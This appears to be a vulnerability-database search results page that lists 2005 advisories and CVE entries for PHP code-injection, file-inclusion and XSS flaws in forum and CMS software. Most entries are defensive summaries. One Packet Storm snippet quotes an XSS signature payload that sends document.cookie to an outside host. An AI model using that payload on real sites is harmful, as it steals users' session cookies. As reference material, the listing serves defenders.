7187 matches found

Tenable Nessus
added 2005/10/05 12:0 a.m. | 38 views

Debian DSA-840-1 : drupal - missing input sanitising

Stefan Esser of the Hardened-PHP Project reported a serious vulnerability in the third-party XML-RPC library included with some Drupal versions. An attacker could execute arbitrary PHP code on a target site. This update pulls in the latest XML-RPC version from upstream. ...

7.5 CVSS | 6 AI score | 0.04688 EPSS
Exploits 5 | References 2

Tenable Nessus
added 2005/10/05 12:0 a.m. | 31 views

Debian DSA-842-1 : egroupware - missing input sanitising

Stefan Esser discovered a vulnerability in the XML-RPC libraries which are also present in egroupware, a web-based groupware suite, that allows injection of arbitrary PHP code into eval statements. ...

7.5 CVSS | 5.7 AI score | 0.04688 EPSS
Exploits 5 | References 3

Drupal
added 2005/10/03 12:0 a.m. | 4 views

SQL injection and PHP code execution

Wolfgang Ziegler has discovered multiple security vulnerabilities in the contributed flexinode module. Versions affected: Please check the CVS $Id$ fields in the following files to determine whether the version of the flexinode module you are running is vulnerable. All versions older than the...

5.4 AI score
Exploits 0 | References 5

myhack58
added 2005/09/25 12:0 a.m. | 12 views

MolyX vulnerability analysis

Text/SuperHei · Safety Angel S4T 2005.09.21 Nonsense: MolyX Board (hereinafter referred to as MXB) is a PHP forum program developed by the MolyX Studios group, which appears to be the CNVBB team. MXB fuses and absorbs features of many forums and is powerful. The multi-year Forum program finished and improved experience also makes the...

Exploits 0

Tenable Nessus
added 2005/09/23 12:0 a.m. | 22 views

PunBB < 1.2.8 Multiple Vulnerabilities

According to its banner, the version of PunBB installed on the remote host suffers from several flaws.
- A File Include Vulnerability: The application fails to validate the 'language' parameter when a user updates his profile and uses that throughout the application to require PHP code in order to...

4.6 CVSS | 5.8 AI score | 0.00541 EPSS
Exploits 0 | References 3

Tenable Nessus
added 2005/09/22 12:0 a.m. | 21 views

PunBB < 1.2.8 Multiple Vulnerabilities

4.6 CVSS | 7.3 AI score | 0.00541 EPSS
Exploits 0 | References 3

CVE
added 2005/09/21 4:0 a.m. | 40 views

CVE-2005-3010

CVE-2005-3010 affects CuteNews (version 1.4.0 and earlier). A direct static code injection vulnerability in the flood protection feature (inc/shows.inc.php) allows a remote attacker to inject and execute arbitrary PHP code via the HTTP_CLIENT_IP header (Client-Ip), which is injected into data/flo...

7.5 CVSS | 7.9 AI score | 0.02429 EPSS
Exploits 1 | References 3 | Affected Software 1

Tenable Nessus
added 2005/09/19 12:0 a.m. | 10 views

CuteNews flood.db.php HTTP Header PHP Code Injection

7.5 CVSS | 7.3 AI score | 0.02429 EPSS
Exploits 1 | References 1

NVD
added 2005/09/14 8:3 p.m. | 9 views

CVE-2005-2893

Direct static code injection vulnerability in setcookie.php in PBLang 4.65, and possibly earlier versions, allows remote attackers to execute arbitrary PHP code via the username u parameter, which is directly injected into a file that is later executed upon login...

7.5 CVSS | 7.9 AI score | 0.0108 EPSS
Exploits 1 | References 4

CVE
added 2005/09/14 4:0 a.m. | 51 views

CVE-2005-2893

CVE-2005-2893 affects PBLang 4.65 (and possibly earlier). The vulnerability is a direct static code injection in setcookie.php where the username parameter (u) is directly injected into a file that is later executed upon login, enabling remote code execution. The available sources identify the vu...

7.5 CVSS | 7.9 AI score | 0.0108 EPSS
Exploits 1 | References 4 | Affected Software 1

Cvelist
added 2005/09/14 4:0 a.m. | 15 views

CVE-2005-2893

Direct static code injection vulnerability in setcookie.php in PBLang 4.65, and possibly earlier versions, allows remote attackers to execute arbitrary PHP code via the username u parameter, which is directly injected into a file that is later executed upon login...

7.9 AI score | 0.0108 EPSS
Exploits 1 | References 4

Tenable Nessus
added 2005/09/08 12:0 a.m. | 192 views

AMember Multiple Script config[root_dir] Parameter Remote File Inclusion

The remote host appears to be running AMember, a commercial membership and subscription management script written in PHP. The version of AMember installed on the remote host fails to properly sanitize user-supplied input to the 'config[root_dir]' parameter before using it in several scripts to inclu...

7.5 CVSS | 5.9 AI score | 0.00636 EPSS
Exploits 0 | References 2

NVD
added 2005/09/02 11:3 p.m. | 12 views

CVE-2005-2775

phpapi.php in phpWebNotes 2.0.0 uses the extract function to modify key variables such as $tpathcore, which leads to a PHP file inclusion vulnerability that allows remote attackers to execute arbitrary PHP code via the tpathcore parameter...

7.5 CVSS | 7.5 AI score | 0.02256 EPSS
Exploits 1 | References 4

UbuntuCve
added 2005/09/02 11:3 p.m. | 19 views

CVE-2005-2781

The Avatar upload feature in FUD Forum before 2.7.0 does not properly verify uploaded files, which allows remote attackers to execute arbitrary PHP code via a file with a .php extension that contains image data followed by PHP code...

7.5 CVSS | 6.1 AI score | 0.01269 EPSS
Exploits 0 | References 1

Debian CVE
added 2005/09/02 4:0 a.m. | 24 views

CVE-2005-2793

PHP remote file inclusion vulnerability in welcome.php in phpLDAPadmin 0.9.6 and 0.9.7 allows remote attackers to execute arbitrary PHP code via the customwelcomepage parameter...

7.5 CVSS | 7.3 AI score | 0.02938 EPSS
Exploits 1

Tenable Nessus
added 2005/08/31 12:0 a.m. | 13 views

Simple Machines Forum < 1.0.7 Code Injection

5 CVSS | 7.3 AI score | 0.01316 EPSS
Exploits 2 | References 2

Packet Storm
added 2005/08/31 12:0 a.m. | 21 views

lduXSS2.txt

Bug finder: spyMASter. Web site: Realhackers.net. Contact: [email protected]. LDU has some XSS vulns. Firstly, you can use HTML codes in your signature; you can get cookies with this. Put your signature that code location.href='http://site.com/log/ekle.php?c='+escapedocument. cookie and post a topic...

7.4 AI score
Exploits 0

Exploit DB
added 2005/08/31 12:0 a.m. | 33 views

CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/14709/info CMS Made Simple is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may exploit this issue to execute arbitrary remote PHP code on an affected...

7.4 AI score
Exploits 0

Gentoo Linux
added 2005/08/30 12:0 a.m. | 28 views

phpGroupWare: Multiple vulnerabilities

Background: phpGroupWare is a multi-user groupware suite written in PHP. Description: phpGroupWare improperly validates the "mid" parameter retrieved via a forum post. The current version of phpGroupWare also adds several safeguards to prevent XSS issues, and disables the use of a potentially...

7.5 CVSS | 6.5 AI score | 0.04688 EPSS
Exploits 5

Tenable Nessus
added 2005/08/30 12:0 a.m. | 57 views

Debian DSA-789-1 : php4 - several vulnerabilities

Several security-related problems have been found in PHP4, the server-side, HTML-embedded scripting language. The Common Vulnerabilities and Exposures project identifies the following problems:
- CAN-2005-1751: Eric Romang discovered insecure temporary files in the shtool utility shipped with PHP...

7.5 CVSS | 6.2 AI score | 0.86153 EPSS
Exploits 5 | References 6